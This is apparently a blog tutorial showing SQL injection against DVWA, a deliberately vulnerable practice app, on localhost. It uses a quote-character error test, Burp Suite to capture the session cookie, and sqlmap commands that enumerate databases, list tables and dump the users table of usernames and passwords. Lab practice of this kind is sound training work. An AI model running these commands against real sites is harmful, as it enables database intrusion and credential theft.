now i want to injection DVWA on my localhost (level low)
1. we have to find the vulnerabilities on the website.
open browser to see the content
http://localhost/dvwa/vulnerabilities/sqli/
2. then type character ( ' ) to make error
now we find the error
3. open the brup suite. then add new proxy and type localhost and port 8080 on host and port field. then use it.after we use proxy localhost and port 8080 try to refresh and open brup suite to see the cookies.
4.try to inject use sqlmap to see how many databases they have
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=low; PHPSESSID=5ek77a98gkt6gc3351hl4i24c2" --dbs
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql
now we found 4 databases.
4.then type this to see how many tables on database dvwa.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=low; PHPSESSID=5ek77a98gkt6gc3351hl4i24c2" --dbs -D dvwa --tables
5. type this to see the fill of users table.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=low; PHPSESSID=5ek77a98gkt6gc3351hl4i24c2" --dbs -D dvwa -T users --dump
finally we found the username and passowrd ... :D
No comments:
Post a Comment